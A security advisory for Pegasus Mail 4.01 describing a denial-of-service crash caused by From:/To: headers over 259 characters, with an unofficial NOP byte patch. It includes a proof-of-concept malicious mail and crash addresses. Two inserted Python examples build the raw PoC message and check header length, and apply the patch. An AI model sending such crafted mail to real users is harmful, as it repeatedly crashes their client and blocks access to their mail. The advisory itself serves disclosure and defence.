Application: Pegasus Mail (http://www.pmail.com)
Version: 4.01 and possibly previous
Bug: bad handling of the "From:" and "To:" mail headers
Risk: DoS; in some cases the client cannot be opened again until the user has deleted the saved mail from the mail folder
Author: Auriemma Luigi (e-mail: firstname.lastname@example.org)
Sections:
1) Introduction
2) Bug
3) The Code
4) Fix
5) Philosophy
1) Introduction

Pegasus Mail is a widely used free mail client for Windows (32 and 16 bit) and DOS. The version tested is the latest available at the time of writing, 4.01 for Win32. The tests were run on Win98SE, so some details may differ slightly for those on NT/2K/XP or other systems. I contacted all the support mail addresses listed in the program but received no answer, so no official fix is available. This is not a big problem, however, because an advisory is also useful to draw the attention of the vulnerable program's author.
2) Bug

The bug is in the handling of the "From:" and "To:" headers of received mail. Pegasus Mail can handle at most 259 characters in these two fields, so the problem occurs when an attacker sends a few characters more.
For example, the following is a proof-of-concept mail:

  From: myname <250 'A's>
  To: test@localhost
  Subject: Good crash

  You cannot see this text 8-)

(the 260 characters are counted after "From:", so " myname <" + 250 'A's + ">" = 9 + 250 + 1 = 260; the "To:" header behaves identically)
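The following is an added example, not the advisory's attached proof-of-concept: it builds the message above as raw bytes ready for an SMTP DATA command, and pairs it with a simple header-length check of the kind a mail filter could use to reject such messages before they reach a vulnerable client. The 259-character limit is taken from the advisory; the way the value is counted (everything after the colon, including the leading space), the sender address used when "To:" is the oversized field, and the unfolding of continuation lines are assumptions of the example.

```python
"""Proof-of-concept builder and header-length checker for the Pegasus Mail
From:/To: overflow described above.

Added example, not the advisory's attached PoC.  Assumptions are labelled.
"""

# Limit stated in the advisory: at most 259 characters after "From:"/"To:"
# are handled; 260 or more crash Pegasus Mail 4.01.  Assumption: the value is
# counted as the advisory counts it, i.e. everything after the colon including
# the leading space.
PEGASUS_HEADER_LIMIT = 259


def poc_header_value(padding=250):
    """Value used by the advisory's PoC: " myname <" + padding x 'A' + ">".
    With padding=250 this is exactly 260 characters."""
    return " myname <" + "A" * padding + ">"


def build_poc_message(field="From", padding=250, other="test@localhost"):
    """Return the raw message as CRLF-terminated bytes ready for SMTP DATA.
    `field` selects which header ("From" or "To") gets the oversized value."""
    if field not in ("From", "To"):
        raise ValueError("field must be 'From' or 'To'")
    oversized = poc_header_value(padding)
    # Constructed sender used only when "To:" is the field under test.
    from_val = oversized if field == "From" else " attacker@localhost"
    to_val = oversized if field == "To" else " " + other
    lines = [
        "From:" + from_val,
        "To:" + to_val,
        "Subject: Good crash",
        "",
        "You cannot see this text 8-)",
    ]
    return ("\r\n".join(lines) + "\r\n").encode("ascii")


def header_values(raw):
    """Parse the header block of a raw message, unfolding continuation lines.
    Returns {name_lowercase: value_after_colon}.  Whitespace is preserved so
    the lengths match the advisory's counting."""
    text = raw.decode("ascii", errors="replace").replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    headers = {}
    current = None
    for line in head.split("\n"):
        if line[:1] in (" ", "\t") and current is not None:
            # Folded line: keep its leading whitespace, drop only the CRLF.
            headers[current] += line
        elif ":" in line:
            name, value = line.split(":", 1)
            current = name.strip().lower()
            headers[current] = value
    return headers


def oversized_headers(raw, limit=PEGASUS_HEADER_LIMIT):
    """Names of From:/To: headers whose value exceeds `limit` characters.
    An empty list means the message does not trigger this bug."""
    values = header_values(raw)
    return [name for name in ("from", "to")
            if name in values and len(values[name]) > limit]


if __name__ == "__main__":
    msg = build_poc_message("From")
    print(msg.decode("ascii"))
    print("oversized:", oversized_headers(msg))
```

Actually sending the bytes (for instance with smtplib.SMTP.sendmail) is left out so the example runs offline. The check unfolds a value spread over several lines before measuring it, so folding cannot be used to slip an oversized value past the filter, and it reports a 259-character value as safe and a 260-character one as dangerous, matching the boundary the advisory gives.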
The way the program crashes varies with the options that are enabled: Pegasus Mail may crash when the mail is opened, or as soon as new mail is checked. The real problem comes when the client is reopened, because the mail has already been stored in the user's mail folder, so the crash repeats until the bad mail is deleted.

Another problem is that the malformed mail seems to be undeletable from inside the program, because Pegasus Mail crashes again when you try to delete it from the trash. The workaround is to move the mail to the trash and then restart the program, which removes the mail automatically without crashing.
Here are the errors (there are two, one after the other) and how they differ depending on the field being exploited:

"From:": the first error occurs when EIP reaches 0x004157c0, with the exploited header having filled the EDX register.

"To:": the first error occurs when EIP reaches 0x004c668c, with the exploited header having filled the EAX and EDI registers.

The second error occurs in Kernel32.dll at EIP 0xbffc04d4.

(These addresses were observed on the Win98SE test system; the Kernel32.dll address in particular will differ on NT-based Windows.)
3) The Code
The attachment contains:
a) a small proof-of-concept program that sends a mail with an oversized "From:" field; source code and executable for Windows.
b) a patcher for version 4.01 of the program that applies my personal, unofficial fix (useful for anyone who does not know how to use a hex editor).
c) an Italian version of this advisory.
4) Fix

There is no official patch. See the Pegasus Mail site (http://www.pmail.com) for updates.

I have made a PERSONAL and NOT OFFICIAL fix for version 4.01:
File: winpm-32.exe

  address  value
  14DC3    90
  14DC4    90
  14DD7    90
  14DD8    90

(file offsets in hex; 90 is the x86 NOP opcode)

The NOP trick works and all functions seem to be fine, but remember that it is only a temporary workaround, not a proper fix.
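Below is an added example of a minimal patcher for the table above (not the advisory's attached patcher): it backs up the executable, writes 0x90 (x86 NOP) at the four file offsets listed, refuses to touch a file shorter than the highest offset, and returns the bytes it overwrote so the change can be reverted. The page does not list the original bytes at those offsets, so the script cannot verify that it is patching the right build; the backup name and the command-line handling are the example's own choices.

```python
"""Apply the advisory's unofficial NOP patch to winpm-32.exe.

Added example, not the advisory's attached patcher.  The four offsets and the
0x90 value come from the advisory's table; the original byte values at those
offsets are not given on the page, so this script records what it overwrote
instead of checking against expected bytes.
"""
import shutil
from pathlib import Path

# File offsets into winpm-32.exe (version 4.01) and the byte to write, as
# listed in the advisory: 14DC3, 14DC4, 14DD7, 14DD8 -> 0x90 (x86 NOP).
NOP_PATCH = {0x14DC3: 0x90, 0x14DC4: 0x90, 0x14DD7: 0x90, 0x14DD8: 0x90}


def apply_patch(data, patch):
    """Return (patched_bytes, {offset: original_byte}) for an in-memory image.
    Raises ValueError if any offset lies beyond the end of the file, so a file
    that is not the expected build is not silently corrupted."""
    buf = bytearray(data)
    originals = {}
    for off, val in sorted(patch.items()):
        if off >= len(buf):
            raise ValueError(
                "offset 0x%X beyond end of file (0x%X bytes)" % (off, len(buf)))
        originals[off] = buf[off]
        buf[off] = val
    return bytes(buf), originals


def is_patched(data, patch):
    """True if every patched offset already holds the patch value."""
    return all(off < len(data) and data[off] == val
               for off, val in patch.items())


def revert(data, originals):
    """Undo apply_patch() using the originals it returned."""
    buf = bytearray(data)
    for off, val in originals.items():
        buf[off] = val
    return bytes(buf)


def patch_file(path, patch=NOP_PATCH):
    """Back up `path` to `path` + ".orig" (assumed name), write the patched
    image in place and return the original bytes for a later revert."""
    src = Path(path)
    backup = src.with_name(src.name + ".orig")
    if not backup.exists():
        shutil.copy2(src, backup)
    patched, originals = apply_patch(src.read_bytes(), patch)
    src.write_bytes(patched)
    return originals


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "winpm-32.exe"
    changed = patch_file(target)
    for off, val in sorted(changed.items()):
        print("0x%X: 0x%02X -> 0x90" % (off, val))
```

Run it with the path to winpm-32.exe as the only argument; the printed lines are the bytes that were replaced, which is what you would want to keep next to the .orig backup until an official fix replaces this workaround.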
5) Philosophy

I strongly believe in FULL DISCLOSURE, because with it "everyone" can know the real effects of an attack and the real danger of a bug, some people can learn a bit of programming (I learned a bit of C from the source code of some exploits), and it is useful for all the people who believe in this type of disclosure. No secrets!

Any kind of feedback is really welcome!